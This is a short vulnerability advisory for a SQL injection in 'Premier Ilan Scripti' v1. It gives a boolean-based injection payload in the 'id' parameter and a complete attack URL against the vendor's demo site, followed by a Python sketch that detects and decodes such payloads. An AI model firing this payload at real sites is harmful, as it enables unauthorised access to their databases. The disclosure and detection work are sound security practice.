Premier Ilan Scripti 1 SQL Injection

Premier Ilan Scripti version 1 suffers from a remote SQL injection vulnerability.


MD5 | 5133a7c95d32dec7583964b929bc752b

===========================================================================================
# Exploit Title: Premier Ilan Scripti - "id" SQL Inj.
# Dork: N/A
# Date: 29-06-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://v1.ilanscripti.org/
# Software Link: http://v1.ilanscripti.org/
# Version: v1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description:
===========================================================================================
# POC - SQLi
# Parameters : id
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method :
http://v1.ilanscripti.org/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&fiyat1=8100714&fiyat2=3695287&arama=Aramayı Daralt&durumu=0&sehir=0&ilce=0&sm=0&id=6183%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
===========================================================================================
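
Detection sketch for the pattern above, added here as an example (not part of the original advisory and not the vendor's code). It flags requests whose "id" parameter is not a plain number and decodes the hex literals for triage. The function names, the numeric-id rule and the sample request lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: "id" is a short numeric record id, as in the page's URL (id=6183).
NUMERIC_ID = re.compile(r"\d{1,10}")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)  # /**/ used in place of spaces
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
SQL_TOKENS = re.compile(r"\b(rlike|regexp|case|when|then|else|end|and|or)\b", re.I)

# Constructed sample requests; the second carries the pattern shown on this page.
SAMPLE_REQUESTS = [
    "/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&sm=0&id=6183",
    "/kiralik-urunler-kategorino-6183.html?sayfa=kategorigoruntule&sm=0&id=6183"
    "%27/**/RLIKE/**/(case/**/when/**//**/8885330=8885330/**/then/**/"
    "0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='",
]


def inspect_id(request):
    """Return None when id is absent or numeric, otherwise a triage record."""
    params = dict(parse_qsl(urlsplit(request).query, keep_blank_values=True))
    value = params.get("id")
    if value is None or NUMERIC_ID.fullmatch(value):
        return None
    # Treat comment padding as whitespace so keyword matching sees real tokens.
    normalized = INLINE_COMMENT.sub(" ", value)
    return {
        "raw": value,
        "comment_padding": len(INLINE_COMMENT.findall(value)),
        "sql_tokens": sorted({t.lower() for t in SQL_TOKENS.findall(normalized)}),
        # Hex literals hide string constants from keyword filters; decode them.
        "hex_decoded": [bytes.fromhex(h).decode("latin-1")
                        for h in HEX_LITERAL.findall(normalized)],
    }


def scan(requests):
    """Return (request, finding) pairs for every request with a non-numeric id."""
    hits = []
    for request in requests:
        finding = inspect_id(request)
        if finding is not None:
            hits.append((request, finding))
    return hits


if __name__ == "__main__":
    for request, finding in scan(SAMPLE_REQUESTS):
        print(finding["sql_tokens"], finding["hex_decoded"])
```

The same numeric-only rule, enforced server-side before the value reaches the query (together with a bound parameter), rejects this request outright.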
